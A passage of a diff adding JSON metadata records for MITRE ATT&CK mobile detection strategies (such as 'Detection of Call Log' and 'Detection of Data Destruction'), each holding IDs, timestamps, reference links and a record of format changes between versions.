+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--0abd72c9-7d7f-4e8a-99d7-5ac2f791eb9d",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.668000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0703",
+                            "external_id": "DET0703"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Call Control",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--d2cf1cf2-7b11-4018-b5bc-fbd48633f869"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.668000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--0a21ca34-ffa0-4b6f-b88c-9ffdb6a7c38f",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.668000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0602",
+                            "external_id": "DET0602"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Call Log",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--9ed67778-6277-4e12-aa3e-29f39a81e67a",
+                        "x-mitre-analytic--9cd8928d-a26d-42c0-8a23-0b10816c5d21"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.668000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--7b0e17a4-df7c-4f4b-8b15-e8aac2236fc6",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.682000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0643",
+                            "external_id": "DET0643"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Clipboard Data",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--4b2e7e2d-e1be-4829-9011-53eb5eca3dc6",
+                        "x-mitre-analytic--2f0ca83e-1318-4722-88b2-1bffedb5d127"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.682000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--ab6215b7-19e0-4644-b340-40b6dcc90a48",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.687000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0619",
+                            "external_id": "DET0619"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Code Signing Policy Modification",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--04fbc0f1-82f0-4311-9c39-6b519b48e7d8",
+                        "x-mitre-analytic--8e20de5b-1b9c-4443-a095-bcdd52ed161e"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.687000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--694c70ab-0518-432a-a149-a7b185ad814b",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.680000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0655",
+                            "external_id": "DET0655"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Command and Scripting Interpreter",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--a4242809-30bc-4c00-b247-b6cc11644a07",
+                        "x-mitre-analytic--77c81bf1-beef-429a-a426-a716b489383a"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.680000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--113d83d6-e0a2-44af-955d-288bd4ef21c4",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.669000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0649",
+                            "external_id": "DET0649"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Compromise Application Executable",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--75c4eac4-c61c-4d02-acd9-ec8f5b6cfaff"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.669000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--7c7aa84d-8425-42cc-b0bc-5d384b04d99a",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.682000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0712",
+                            "external_id": "DET0712"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Compromise Client Software Binary",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--fdb6acce-e069-4e35-8a4b-f4517924f092",
+                        "x-mitre-analytic--98b0a8a6-881d-4f00-84c3-3f70d368067e"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.682000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--ef792e16-8b1c-452d-a3ae-1ad4b5577a4d",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.697000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0604",
+                            "external_id": "DET0604"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Compromise Hardware Supply Chain",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--9e2b0e14-eabd-4eb7-93b0-da238e3786db",
+                        "x-mitre-analytic--53491f5a-7062-41f0-a51d-07b52dc8192c"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.697000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--c2133628-efa0-4bb0-9f9a-a475ec6a52e7",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.691000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0704",
+                            "external_id": "DET0704"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Compromise Software Dependencies and Development Tools",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--ffcee6e2-02dd-4053-92a3-8600dd70445e",
+                        "x-mitre-analytic--7a209f60-7f43-407f-b5bd-7877e10222ee"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.691000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--1098f1d3-7dfa-4dc0-b524-98af5588f6f7",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.669000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0721",
+                            "external_id": "DET0721"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Compromise Software Supply Chain",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--b95bc556-c98c-459e-9327-49830ce9c77c",
+                        "x-mitre-analytic--c8eb9196-3134-4954-9331-838556db9aa1"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.669000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--99db5782-6282-4626-901d-b57f8bb8a1f1",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.685000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0659",
+                            "external_id": "DET0659"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Conceal Multimedia Files",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--7247d454-c307-417a-90c7-a15452d0d83e"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.685000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--03c7f8c1-0239-44a2-89e2-4cd6b47940ac",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.667000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0679",
+                            "external_id": "DET0679"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Contact List",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--e0ee0af8-96f8-4baf-b0f2-63d4b49938f2",
+                        "x-mitre-analytic--6f77061e-d663-487d-bfca-cd1e1f1d24d7"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.667000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--b18a1df7-1b2b-4294-963a-e7c9b6489c34",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.688000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0633",
+                            "external_id": "DET0633"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Credentials from Password Store",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--1a27d3ed-86e8-4389-927d-1d43d94dc719"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.688000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--f181f7e1-f70c-4ab3-b8c5-5c0a08ea98d1",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.697000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0671",
+                            "external_id": "DET0671"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Data Destruction",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--44d378d8-575b-41c8-b75c-375abcf3e2db"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.697000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--132ead25-5d93-4616-9847-a4c37d33d3e6",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.669000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0678",
+                            "external_id": "DET0678"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Data Encrypted for Impact",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--c37bba44-9ca2-4444-8ee9-7cab0b2fd5fd"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.669000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--6c1d15de-c055-4514-ac16-9cdd8e9b2764",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.680000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0660",
+                            "external_id": "DET0660"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Data Manipulation",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--332065d4-9895-485b-8674-756f4d3fab7c"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.680000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--a5942766-8bd2-4747-baaf-a5850f08f550",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.687000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0713",
+                            "external_id": "DET0713"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Data from Local System",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--983ae9ea-a125-498a-862d-00d5bed2087a",
+                        "x-mitre-analytic--b7b70725-f1d8-4fad-8fc4-fc1b9cbf77ef"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.687000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--83a0e3a2-5828-4707-84f5-eec67cf6b50e",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.683000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0617",
+                            "external_id": "DET0617"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Dead Drop Resolver",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--8503331d-09f5-49d3-838c-f0d3b1d55e30",
+                        "x-mitre-analytic--acc1bb20-bd46-4228-abba-f4befe82e926"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
